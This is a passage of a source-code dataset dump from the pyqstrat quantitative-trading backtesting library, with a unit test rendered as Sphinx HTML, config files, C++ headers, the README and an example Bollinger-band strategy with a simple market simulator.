class=\"p\">(</span><span class=\"n\">by</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;entry_timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">df_rts</span></div></div>\n\n\n<div class=\"viewcode-block\" id=\"test_account\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.test_account\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">test_account</span><span class=\"p\">():</span>\n <span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_types</span> <span class=\"kn\">import</span> <span class=\"n\">MarketOrder</span>\n\n <span class=\"k\">def</span> <span class=\"nf\">get_close_price</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">idx</span><span class=\"p\">,</span> <span class=\"n\">strategy_context</span><span class=\"p\">):</span>\n <span class=\"k\">if</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;IBM&quot;</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">idx</span> <span class=\"o\">+</span> <span class=\"mf\">10.1</span>\n <span class=\"k\">elif</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;MSFT&quot;</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">idx</span> <span class=\"o\">+</span> <span class=\"mf\">15.3</span>\n <span class=\"k\">elif</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;AAPL&#39;</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">idx</span> <span class=\"o\">+</span> <span class=\"mi\">10</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;unknown contract: </span><span class=\"si\">{</span><span class=\"n\">contract</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">price</span>\n\n <span class=\"n\">ContractGroup</span><span class=\"o\">.</span><span class=\"n\">clear</span><span class=\"p\">()</span>\n <span class=\"n\">Contract</span><span class=\"o\">.</span><span class=\"n\">clear</span><span class=\"p\">()</span>\n <span class=\"n\">ibm_cg</span> <span class=\"o\">=</span> <span class=\"n\">ContractGroup</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span class=\"s1\">&#39;IBM&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">msft_cg</span> <span class=\"o\">=</span> <span class=\"n\">ContractGroup</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span class=\"s1\">&#39;MSFT&#39;</span><span class=\"p\">)</span>\n\n <span class=\"n\">ibm_contract</span> <span class=\"o\">=</span> <span class=\"n\">Contract</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span 
class=\"s1\">&#39;IBM&#39;</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"o\">=</span><span class=\"n\">ibm_cg</span><span class=\"p\">)</span>\n <span class=\"n\">msft_contract</span> <span class=\"o\">=</span> <span class=\"n\">Contract</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span class=\"s1\">&#39;MSFT&#39;</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"o\">=</span><span class=\"n\">msft_cg</span><span class=\"p\">)</span>\n\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"s1\">&#39;2018-01-01 09:00&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;2018-01-02 08:00&#39;</span><span class=\"p\">,</span> \n <span class=\"s1\">&#39;2018-01-02 09:00&#39;</span><span class=\"p\">,</span> \n <span class=\"s1\">&#39;2018-01-05 13:35&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;2018-01-05 13:36&#39;</span><span class=\"p\">],</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"s1\">&#39;M8[m]&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">trade_1</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-01 09:00&#39;</span><span class=\"p\">),</span> <span class=\"mi\">10</span><span class=\"p\">),</span> \n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-02 08:00&#39;</span><span class=\"p\">),</span> <span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mf\">10.1</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.01</span><span class=\"p\">)</span>\n <span class=\"n\">trade_2</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-01 09:00&#39;</span><span class=\"p\">),</span> <span class=\"o\">-</span><span class=\"mi\">20</span><span class=\"p\">),</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-02 09:00&#39;</span><span class=\"p\">),</span> <span class=\"o\">-</span><span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"mf\">15.1</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.02</span><span class=\"p\">)</span>\n <span class=\"n\">trade_3</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span 
class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">],</span> <span class=\"mi\">15</span><span class=\"p\">),</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">],</span> <span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"mf\">13.2</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.04</span><span class=\"p\">)</span>\n <span class=\"n\">trade_4</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">20</span><span class=\"p\">),</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"mf\">16.2</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.05</span><span class=\"p\">)</span>\n <span class=\"n\">trade_5</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">5</span><span class=\"p\">),</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">5</span><span class=\"p\">,</span> <span class=\"mf\">16.21</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.03</span><span class=\"p\">)</span>\n\n <span class=\"n\">account</span> <span class=\"o\">=</span> <span class=\"n\">Account</span><span class=\"p\">([</span><span class=\"n\">ibm_cg</span><span class=\"p\">,</span> <span class=\"n\">msft_cg</span><span class=\"p\">],</span> <span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">get_close_price</span><span class=\"p\">,</span> <span class=\"kc\">None</span><span class=\"p\">)</span>\n <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">add_trades</span><span class=\"p\">([</span><span class=\"n\">trade_1</span><span class=\"p\">,</span> <span class=\"n\">trade_2</span><span class=\"p\">,</span> <span class=\"n\">trade_3</span><span class=\"p\">,</span> <span class=\"n\">trade_4</span><span class=\"p\">,</span> <span class=\"n\">trade_5</span><span class=\"p\">])</span>\n <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">calc</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-05 13:35&#39;</span><span class=\"p\">))</span>\n\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">account</span><span 
class=\"o\">.</span><span class=\"n\">df_trades</span><span class=\"p\">())</span> <span class=\"o\">==</span> <span class=\"mi\">5</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_pnl</span><span class=\"p\">())</span> <span class=\"o\">==</span> <span class=\"mi\">6</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">allclose</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"mf\">9.99</span><span class=\"p\">,</span> <span class=\"mf\">61.96</span><span class=\"p\">,</span> <span class=\"mf\">79.97</span><span class=\"p\">,</span> <span class=\"mf\">109.33</span><span class=\"p\">,</span> <span class=\"mf\">69.97</span><span class=\"p\">,</span> <span class=\"mf\">154.33</span><span class=\"p\">]),</span> <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_pnl</span><span class=\"p\">()</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">rtol</span><span class=\"o\">=</span><span class=\"mi\">0</span><span class=\"p\">))</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">allclose</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mi\">45</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mi\">45</span><span class=\"p\">]),</span> <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_pnl</span><span class=\"p\">()</span><span class=\"o\">.</span><span class=\"n\">position</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">rtol</span><span class=\"o\">=</span><span class=\"mi\">0</span><span class=\"p\">))</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">allclose</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"mf\">1000000.</span><span class=\"p\">,</span> <span class=\"mf\">1000189.3</span><span class=\"p\">,</span> <span class=\"mf\">1000224.3</span><span class=\"p\">]),</span> <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_account_pnl</span><span class=\"p\">()</span><span class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">rtol</span><span class=\"o\">=</span><span class=\"mi\">0</span><span class=\"p\">))</span></div>\n\n\n<span class=\"k\">if</span> <span class=\"vm\">__name__</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;__main__&quot;</span><span class=\"p\">:</span>\n <span 
class=\"n\">test_account</span><span class=\"p\">()</span>\n <span class=\"kn\">import</span> <span class=\"nn\">doctest</span>\n <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">testmod</span><span class=\"p\">(</span><span class=\"n\">optionflags</span><span class=\"o\">=</span><span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">NORMALIZE_WHITESPACE</span><span class=\"p\">)</span>\n<span class=\"c1\"># $$_end_code</span>\n</pre></div>\n\n </div>\n \n </div>\n </div>\n <div class=\"sphinxsidebar\" role=\"navigation\" aria-label=\"main navigation\">\n <div class=\"sphinxsidebarwrapper\">\n<h1 class=\"logo\"><a href=\"../../index.html\">pyqstrat</a></h1>\n\n\n\n\n\n\n\n\n<h3>Navigation</h3>\n<p class=\"caption\" role=\"heading\"><span class=\"caption-text\">Contents:</span></p>\n<ul>\n<li class=\"toctree-l1\"><a class=\"reference internal\" href=\"../../modules.html\">pyqstrat</a></li>\n</ul>\n\n<div class=\"relations\">\n<h3>Related Topics</h3>\n<ul>\n <li><a href=\"../../index.html\">Documentation overview</a><ul>\n <li><a href=\"../index.html\">Module code</a><ul>\n </ul></li>\n </ul></li>\n</ul>\n</div>\n<div id=\"searchbox\" style=\"display: none\" role=\"search\">\n <h3 id=\"searchlabel\">Quick search</h3>\n <div class=\"searchformwrapper\">\n <form class=\"search\" action=\"../../search.html\" method=\"get\">\n <input type=\"text\" name=\"q\" aria-labelledby=\"searchlabel\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\" spellcheck=\"false\"/>\n <input type=\"submit\" value=\"Go\" />\n </form>\n </div>\n</div>\n<script>document.getElementById('searchbox').style.display = \"block\"</script>\n\n\n\n\n\n\n\n\n </div>\n </div>\n <div class=\"clearer\"></div>\n </div>\n <div class=\"footer\">\n &copy;2018, Sal Abbasi.\n \n |\n Powered by <a href=\"http://sphinx-doc.org/\">Sphinx 5.1.1</a>\n &amp; <a href=\"https://github.com/bitprophet/alabaster\">Alabaster 0.7.12</a>\n \n </div>\n\n \n\n \n </body>\n</html>" }, { "alpha_fraction": 0.7870370149612427, "alphanum_fraction": 0.7870370149612427, "avg_line_length": 26.25, "blob_id": "e59664e08d27ebb44efe99d657009dddd20f6f7e", "content_id": "cd6a0c37531ce2c5afd98a3985080372f1fe4bb1", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 108, "license_type": "permissive", "max_line_length": 51, "num_lines": 4, "path": "/pytest.ini", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "[pytest]\npython_files = *.py\naddopts = --doctest-modules\ndoctest_optionflags = NORMALIZE_WHITESPACE ELLIPSIS" }, { "alpha_fraction": 0.5719178318977356, "alphanum_fraction": 0.5890411138534546, "avg_line_length": 14.368420600891113, "blob_id": "0a714abbe49c0adce90db97d5ff88579f859d46f", "content_id": "b22cb9c1fcd29e10eebd79faea81b5241576eb32", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 292, "license_type": "permissive", "max_line_length": 41, "num_lines": 19, "path": "/pyqstrat/cpp/io/main.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// main.cpp\n// testcpp\n//\n// Created by Sal Abbasi on 9/6/22.\n//\n\n#include <iostream>\n#include <string>\n#include \"csv_reader.hpp\"\n\nusing namespace std;\n\nint main(int argc, const char * argv[]) {\n //test_zip_reader();\n test_csv_reader_zip();\n std::cout << \"done\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.557692289352417, 
"alphanum_fraction": 0.7259615659713745, "avg_line_length": 13.785714149475098, "blob_id": "5fd0db9fc83a52e83843709f1152cb9cfa3e4f01", "content_id": "7f56d832e33ec079b39460617eb20386a6b0710c", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 208, "license_type": "permissive", "max_line_length": 26, "num_lines": 14, "path": "/requirements.txt", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "pandas>=0.22\nnumpy>=1.14\nmatplotlib>=2.2.2\nscipy>=1.0.0\nstatsmodels>=0.11\nipython>=6.5.0\npybind11>=2.2\nsortedcontainers>=2.0.5\nh5py>=2.9\nipywidgets>=7.5\nplotly>=4.10\ntypes-python-dateutil>=0.1\ncython\npyyaml\n\n" }, { "alpha_fraction": 0.5412843823432922, "alphanum_fraction": 0.5565749406814575, "avg_line_length": 14.571428298950195, "blob_id": "dc05fe11a6be763dc5c5142327c7b7dcd2070d2f", "content_id": "5e7de870259e118e3c8ea5ef5450de36373fc0f3", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 327, "license_type": "permissive", "max_line_length": 63, "num_lines": 21, "path": "/pyqstrat/cpp/io/utils.hpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// utils.hpp\n// py_c_test\n//\n// Created by Sal Abbasi on 9/12/22.\n//\n\n#ifndef utils_hpp\n#define utils_hpp\n\n#include <string.h>\n#include <sstream>\n\n#define error(msg) \\\n{ \\\nstd::ostringstream os; \\\nos << msg << \" file: \" << __FILE__ << \" line: \" << __LINE__ ; \\\nthrow std::runtime_error(os.str()); \\\n}\n\n#endif /* utils_hpp */\n" }, { "alpha_fraction": 0.715678334236145, "alphanum_fraction": 0.7254264950752258, "avg_line_length": 48.20000076293945, "blob_id": "ec68e100c011268c95cf5def95f28e449e8f8be0", "content_id": "e1928eb652e349bed4c9616a1e001ae8f6e6b941", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1231, "license_type": "permissive", "max_line_length": 130, "num_lines": 25, "path": "/pyqstrat/cpp/options/options.hpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#ifndef options_hpp\n#define options_hpp\n\n// Black Scholes options calculations from www.jaeckel.org/LetsBeRational.7z\n\ndouble pdf(double x);\ndouble cdf(double x);\ndouble d1(double S, double K, double t, double r, double sigma, double q = 0);\ndouble d2(double S, double K, double t, double r, double sigma, double q = 0);\ndouble black_scholes_price(bool call, double S, double K, double t, double r, double sigma, double q = 0);\ndouble delta(bool call, double S, double K, double t, double r, double sigma, double q = 0);\ndouble theta(bool call, double S, double K, double t, double r, double sigma, double q = 0);\n// Use _ to avoid conflict with gamma in math.h\ndouble _gamma(double S, double K, double t, double r, double sigma, double q = 0);\ndouble vega(double S, double K, double t, double r, double sigma, double q = 0);\ndouble rho(bool call, double S, double K, double t, double r, double sigma, double q = 0);\ndouble implied_vol(bool call, double price, double S, double K, double t, double r, double q = 0);\n\n// From lets be rational\n\n#include \"../lets_be_rational/importexport.h\"\n\nEXPORT_EXTERN_C double implied_volatility_from_a_transformed_rational_guess(double price, double F, double K, double T, double q);\n\n#endif\n\n" }, { "alpha_fraction": 0.7549164295196533, "alphanum_fraction": 0.76474928855896, "avg_line_length": 
44.66292190551758, "blob_id": "4714bff9d954fdd0243391b7bba9a92699c04896", "content_id": "abdc34b1b3a879565859775873ded0ce3b77ed37", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4068, "license_type": "permissive", "max_line_length": 292, "num_lines": 89, "path": "/README.rst", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "|PyVersion| |Status| |License|\n\nIntroduction\n============\n\nThe ``pyqstrat`` package is designed for backtesting quantitative strategies. It was originally built for my own use as a quant trader / researcher, after I could not find a python based framework that was fast, extensible and transparent enough for use in my work. \n\nThis framework is designed for capable programmers who are comfortable with numpy and reasonably advanced Python techniques.\n\nThe goals are:\n\n* Speed - Performance sensitive components are written at the numpy level, or in C++, which can lead to performance improvement of several orders of magnitude over regular Python code. Where possible, we parallelize work so you can take advantage of all the cores available on your machine.\n* Transparency - If you are going to commit money to a strategy, you want to know exactly what assumptions you are making. The code is written and documented so these are as clear as possible.\n* Extensibility - It would be impossible to think of all requirements for backtesting strategies that traders could come up with. In addition, traders will want to measure different metrics depending on the strategy being traded.\n\nUsing this framework, you can:\n\n* Create indicators, trading signals, trading rules and market simulators and add them to a strategy\n* Create contract groups for PNL grouping. For example, for futures and options, you often have a group such as the \"front-month future\" or the \"delta hedge\" where the actual instruments change over time but you still want to analyze PNL at the contract group level.\n* Reuse existing market simulation or add your own assumptions to simulate how and when orders are filled\n* Measure returns, drawdowns, common return metrics such as Sharpe, Calmar and also add your own metrics.\n* Optimize your strategy's parameters using all the CPU cores on your machine.\n\n\n** NOTE: This is beta software and the API will change **\n\nInstallation\n------------\nI would strongly recommend installing anaconda and creating an anaconda environment. I personally prefer miniconda which runs much faster than the original anaconda. See https://github.com/conda-forge/miniforge for installation instructions.\n\npyqstrat relies on numpy, scipy, matplotlib and pandas which in turn use Fortran and C code that needs to be compiled.\n\n::\n\n    conda install --channel conda-forge pyqstrat\n\nRequirements:\n\n* Python_ version 3.10 or higher;\n\nDocumentation\n-------------\n\nThe best way to get started is to go through this Jupyter notebook: `Building Strategies <https://github.com/abbass2/pyqstrat/tree/master/pyqstrat/notebooks/building_strategies.ipynb>`_\n\n`Jupyter Notebooks <https://github.com/abbass2/pyqstrat/tree/master/pyqstrat/notebooks>`_ \n\n`API docs <https://abbass2.github.io/pyqstrat>`_\n
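\nFor orientation, here is a minimal sketch of the workflow, condensed from the bundled example strategy (pyqstrat/notebooks/support/build_example_strategy.py, shown further below); the indicator, signal, rule and market simulator functions named here, and variables such as timestamps and prices, are defined in that file::\n\n    import pyqstrat as pq\n\n    contract_group = pq.ContractGroup.create('PEP')\n    strategy = pq.Strategy(timestamps, [contract_group], get_price, trade_lag = 1, strategy_context = strategy_context)\n    strategy.add_indicator('c', prices.c.values)\n    strategy.add_signal('bb_signal', bollinger_band_signal, depends_on_indicators = ['c'])\n    strategy.add_rule('bb_trading_rule', bollinger_band_trading_rule, signal_name = 'bb_signal', sig_true_values = [-2, -1, 1, 2])\n    strategy.add_market_sim(market_simulator)\n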
\nDiscussion\n----------\n\nThe `pyqstrat user group <https://groups.io/g/pyqstrat>`_ is the group used for pyqstrat discussions.\n\n\nAcknowledgements\n----------------\n\nBefore building this, I looked at the following. Although I ended up not using them, they are definitely worth looking at.\n\n`R quantstrat library <https://github.com/braverock/quantstrat>`_\n\n`Python backtrader project <https://www.backtrader.com>`_\n\n\nSome of the ideas I use in this framework come from the following books\n\n`Trading Systems: A New Approach to System Development and Portfolio Optimisation - Tomasini, Emilio and Jaekle, Urban <https://www.amazon.com/gp/product/1905641796/ref=oh_aui_search_detailpage?ie=UTF8&psc=1>`_\n\n`Machine Trading - Chan, Ernie <https://www.amazon.com/gp/product/1119219604>`_\n\n`Algorithmic Trading: Winning Strategies and Their Rationale - Chan, Ernie <https://www.amazon.com/gp/product/1118460146>`_\n\n\nDisclaimer\n----------\n\nThe software is provided on the conditions of the simplified BSD license.\n\n.. _Python: http://www.python.org\n\n.. |PyVersion| image:: https://img.shields.io/badge/python-3.10+-blue.svg\n   :alt:\n\n.. |Status| image:: https://img.shields.io/badge/status-beta-green.svg\n   :alt:\n\n.. |License| image:: https://img.shields.io/badge/license-BSD-blue.svg\n   :alt:\n \n" }, { "alpha_fraction": 0.6462730765342712, "alphanum_fraction": 0.6543535590171814, "avg_line_length": 43.26277542114258, "blob_id": "f0200c8f8b67191204b3f3178c7859400462df42", "content_id": "e619015bfb41b6384faacdd21d13381915caa741", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6064, "license_type": "permissive", "max_line_length": 152, "num_lines": 137, "path": "/pyqstrat/notebooks/support/build_example_strategy.py", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "# type: ignore\n# flake8: noqa\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport math\nfrom types import SimpleNamespace\nimport pyqstrat as pq\n\ndef sma(contract_group, timestamps, indicators, strategy_context): # simple moving average\n    sma = pd.Series(indicators.c).rolling(window = strategy_context.lookback_period).mean()\n    return sma.values\n\ndef band(contract_group, timestamps, indicators, strategy_context, upper):\n    std = pd.Series(indicators.c).rolling(window = strategy_context.lookback_period).std()\n    return indicators.sma + strategy_context.num_std * std * (1 if upper else -1)\n\nupper_band = lambda contract_group, timestamps, indicators, strategy_context : \\\n    band(contract_group, timestamps, indicators, strategy_context, upper = True)\n\nlower_band = lambda contract_group, timestamps, indicators, strategy_context : \\\n    band(contract_group, timestamps, indicators, strategy_context, upper = False)\n\ndef bollinger_band_signal(contract_group, timestamps, indicators, parent_signals, strategy_context):\n    # Replace nans with 0 so we don't get errors later when comparing nans to floats\n    h = np.nan_to_num(indicators.h)\n    l = np.nan_to_num(indicators.l)\n    \n    upper_band = np.nan_to_num(indicators.upper_band)\n    lower_band = np.nan_to_num(indicators.lower_band)\n    sma = np.nan_to_num(indicators.sma)\n    \n    signal = np.where(h > upper_band, 2, 0)\n    signal = np.where(l < lower_band, -2, signal)\n    signal = np.where((h > sma) & (signal == 0), 1, signal) # price crossed above simple moving avg but not above upper band\n    signal = np.where((l < sma) & (signal == 0), -1, signal) # price crossed below simple moving avg but not below lower band\n    return signal\n
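\n# Worked illustration of the signal encoding above (for orientation only, not executed):\n# suppose on some bar sma = 100, upper_band = 102 and lower_band = 98. Then:\n#   h = 103             -> signal  2  (high crossed above the upper band)\n#   l = 97              -> signal -2  (low crossed below the lower band)\n#   h = 101, l = 99     -> signal  1  (above the moving average but inside the bands)\n#   h = 99.5, l = 98.5  -> signal -1  (below the moving average but inside the bands)\n# The trading rule below enters on +/-2 and exits an open position on the opposing +/-1.\n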
\ndef bollinger_band_trading_rule(contract_group, i, timestamps, indicators, signal, account, current_orders, strategy_context):\n    timestamp = timestamps[i]\n    curr_pos = account.position(contract_group, timestamp)\n    signal_value = signal[i]\n    risk_percent = 0.1\n    close_price = indicators.c[i]\n    \n    contract = contract_group.get_contract('PEP')\n    if contract is None:\n        contract = pq.Contract.create(symbol = 'PEP', contract_group = contract_group)\n    \n    # if we don't already have a position, check if we should enter a trade\n    if math.isclose(curr_pos, 0):\n        if signal_value == 2 or signal_value == -2:\n            curr_equity = account.equity(timestamp)\n            order_qty = np.round(curr_equity * risk_percent / close_price * np.sign(signal_value))\n            trigger_price = close_price\n            reason_code = pq.ReasonCode.ENTER_LONG if order_qty > 0 else pq.ReasonCode.ENTER_SHORT\n            return [pq.StopLimitOrder(contract=contract, timestamp=timestamp, qty=order_qty, trigger_price=trigger_price, reason_code=reason_code)]\n    \n    else: # We have a current position, so check if we should exit\n        if (curr_pos > 0 and signal_value == -1) or (curr_pos < 0 and signal_value == 1):\n            order_qty = -curr_pos\n            reason_code = pq.ReasonCode.EXIT_LONG if order_qty < 0 else pq.ReasonCode.EXIT_SHORT\n            return [pq.MarketOrder(contract=contract, timestamp=timestamp, qty=order_qty, reason_code=reason_code)]\n    return []\n\ndef market_simulator(orders, i, timestamps, indicators, signals, strategy_context):\n    trades = []\n    timestamp = timestamps[i]\n    \n    \n    for order in orders:\n        trade_price = np.nan\n        \n        cgroup = order.contract.contract_group\n        ind = indicators[cgroup]\n        \n        o, h, l, c = ind.o[i], ind.h[i], ind.l[i], ind.c[i]\n        \n        if isinstance(order, pq.MarketOrder):\n            trade_price = 0.5 * (o + h) if order.qty > 0 else 0.5 * (o + l)\n        elif isinstance(order, pq.StopLimitOrder):\n            if (order.qty > 0 and h > order.trigger_price) or (order.qty < 0 and l < order.trigger_price): # A stop order\n                trade_price = 0.5 * (order.trigger_price + h) if order.qty > 0 else 0.5 * (order.trigger_price + l)\n        else:\n            raise Exception(f'unexpected order type: {order}')\n        \n        if np.isnan(trade_price): continue\n        \n        trade = pq.Trade(order.contract, order, timestamp, order.qty, trade_price, commission = abs(order.qty) * 5, fee = 0) # abs(qty) so sell orders are charged, not credited, commission\n        order.status = 'filled'\n        \n        trades.append(trade)\n        \n    return trades\n
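\n# Fill-model illustration: the simulator above is an assumption of this example, not a\n# pyqstrat requirement. Market orders fill at the midpoint of the bar's open and its\n# high (buys) or low (sells). Stop orders only trigger if the bar's high/low crosses the\n# trigger price, and then fill at the midpoint of the trigger price and the high/low,\n# e.g. a buy stop with trigger_price = 100 on a bar with h = 104 fills at 0.5 * (100 + 104) = 102.\n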
